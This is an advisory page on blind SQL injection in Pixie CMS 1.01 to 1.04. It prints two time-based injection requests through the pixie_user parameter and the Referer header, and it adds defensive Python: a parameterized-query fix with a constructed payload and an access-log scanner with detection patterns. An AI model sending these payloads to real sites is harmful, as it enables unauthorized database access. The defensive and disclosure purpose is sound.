Vendor: Pixie CMS
Author: Piranha
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Pixie CMS
Affected Version From: 01.01
Affected Version To: 01.04
Patch Exists: NO
Related CWE: None
CPE: a:pixie_cms:pixie_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
Year: 2011

Pixie CMS 1.01 – 1.04 “Referer” Blind SQL Injection

A Blind SQL Injection vulnerability exists in Pixie CMS versions 1.01 - 1.04. An attacker can send a specially crafted HTTP request with a malicious Referer header to the vulnerable application in order to execute arbitrary SQL commands. If the injected condition is true, the application delays its response by about 5 seconds, so the result of each condition can be inferred from the response time.

Mitigation:

The application should use parameterized (prepared) queries so that header and request-parameter values are never spliced into SQL text; input validation of the Referer header and the pixie_user parameter adds defense in depth but is not a substitute for parameterization.
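The following is an added example, not code from the page or from Pixie CMS. It uses an in-memory SQLite table whose name and columns (pixie_log, referer, log_important, log_id) are assumptions chosen to mirror the column names visible in the advisory's payload, and it contrasts the vulnerable string-splicing pattern with a parameterized UPDATE. It also includes a Referer validator to show why validation alone is weak here: a single quote is a legal URL character under RFC 3986, so the validator only rejects the payload because its host part is not a valid DNS name.

```python
import re
import sqlite3
from urllib.parse import urlsplit

# Constructed stand-in for a CMS visitor log. Table and column names are
# assumptions for this example; they are not Pixie CMS's real schema.
SCHEMA = """
CREATE TABLE pixie_log (
    log_id        INTEGER PRIMARY KEY,
    pixie_user    TEXT,
    referer       TEXT,
    log_important INTEGER NOT NULL DEFAULT 0
);
INSERT INTO pixie_log (log_id, pixie_user, referer, log_important)
VALUES (1, 'guest', '', 0);
"""

# Constructed payload in the shape shown in the advisory: a quote closes the
# string literal and the remainder is parsed as further SET assignments.
TAMPERING_REFERER = "x',log_important=1,log_id='1"

HOSTNAME_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*$")


def fresh_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with one log row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def store_referer_vulnerable(conn: sqlite3.Connection, log_id: int, referer: str) -> None:
    """Vulnerable pattern: the header value is spliced into the SQL text."""
    sql = "UPDATE pixie_log SET referer='%s' WHERE log_id=%d" % (referer, log_id)
    conn.execute(sql)
    conn.commit()


def store_referer_safe(conn: sqlite3.Connection, log_id: int, referer: str) -> None:
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    conn.execute("UPDATE pixie_log SET referer=? WHERE log_id=?", (referer, log_id))
    conn.commit()


def is_plausible_referer(value: str, max_len: int = 2048) -> bool:
    """Defense in depth: accept only http(s) URLs whose host is a DNS-style name.

    A quote is a legal URL character, so character allow-listing alone cannot
    remove it; this check rejects the advisory-style payload only because the
    host part is not a valid name.
    """
    if len(value) > max_len:
        return False
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        return False
    return bool(HOSTNAME_RE.match(parts.hostname or ""))


def row_for(conn: sqlite3.Connection, log_id: int):
    """Return (referer, log_important) for one row, or None if it is gone."""
    cur = conn.execute(
        "SELECT referer, log_important FROM pixie_log WHERE log_id=?", (log_id,)
    )
    return cur.fetchone()


def demo() -> dict:
    """Run both code paths against the same payload and report what was stored."""
    vuln = fresh_db()
    store_referer_vulnerable(vuln, 1, TAMPERING_REFERER)
    safe = fresh_db()
    store_referer_safe(safe, 1, TAMPERING_REFERER)
    return {
        "vulnerable": row_for(vuln, 1),        # ('x', 1): another column was rewritten
        "parameterized": row_for(safe, 1),     # (payload, 0): stored as inert text
        "validator_accepts_payload": is_plausible_referer(TAMPERING_REFERER),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the vulnerable path the quote in the header value terminates the literal and the attacker-controlled text rewrites log_important, exactly the column the advisory's payload targets; in the parameterized path the whole string lands in the referer column as data and no other column changes.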

Exploit-DB raw data:

Exploit Title: Pixie CMS 1.01 - 1.04 "pixie_user" Blind SQL Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha, piranha[at]torontomail.com
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/?pixie_user=x',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Host: localhost:8080
Referer: http://www.google.com/
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with a timeout of ~5 seconds. Notice that the Referer header is required.

Exploit Title: Pixie CMS 1.01 - 1.04 "Referer" Blind SQL Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/
Host: localhost:8080
Referer: http://www.google.com',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with timeout ~5 seconds.
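Both advisories above inject through fields that web servers routinely log: the request target (pixie_user) and the Referer header. The following is an added example, not from the page or Pixie CMS, that scans combined-format access log lines for the indicators of this time-based technique: a delay function call and a quote that breaks out into a new column assignment. The log lines are constructed, not a real capture, and the marker names are this example's own labels.

```python
import re
from urllib.parse import unquote

# Constructed Apache/nginx "combined" format lines; none is a real capture.
# Line 2 carries the injection in the pixie_user parameter, line 3 in the
# Referer header, mirroring the two advisories.
SAMPLE_LOG = """\
127.0.0.1 - - [14/Nov/2011:10:00:00 +0000] "GET /pixie_v1.04/?pixie_user=alice HTTP/1.1" 200 4096 "http://www.google.com/" "Mozilla/5.0"
127.0.0.1 - - [14/Nov/2011:10:00:05 +0000] "GET /pixie_v1.04/?pixie_user=x%27,log_important=IF(1=1,SLEEP(5),NULL),log_id=%271234 HTTP/1.1" 200 4096 "http://www.google.com/" "Mozilla/5.0"
127.0.0.1 - - [14/Nov/2011:10:00:11 +0000] "GET /pixie_v1.04/ HTTP/1.1" 200 4096 "http://www.google.com',log_important=IF(1=1,SLEEP(5),NULL),log_id='1234" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of the time-based technique described on this page.
MARKERS = {
    "time-delay function": re.compile(
        r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I
    ),
    "quote breaking into a SET clause": re.compile(r"'\s*,\s*[A-Za-z_]\w*\s*="),
}


def decode(value: str) -> str:
    """Undo percent-encoding twice; proxies and scanners often encode in layers."""
    return unquote(unquote(value))


def markers_in(value: str) -> list:
    """Names of all markers that match the decoded value, in MARKERS order."""
    text = decode(value)
    return [name for name, pat in MARKERS.items() if pat.search(text)]


def scan_lines(log_text: str) -> list:
    """Return one finding per (line, field) where at least one marker matched."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in ("target", "referer"):
            hits = markers_in(m.group(field))
            if hits:
                findings.append({
                    "line": line_no,
                    "ip": m.group("ip"),
                    "field": field,
                    "markers": hits,
                    "value": decode(m.group(field)),
                })
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f['line']} {f['field']} from {f['ip']}: {', '.join(f['markers'])}")
```

Because the injection is blind, the payload leaves no error in the application log; the access log and the response-time distribution are where it shows, so the timestamps in a real log (here the 5-second gaps between lines) are worth correlating with these matches.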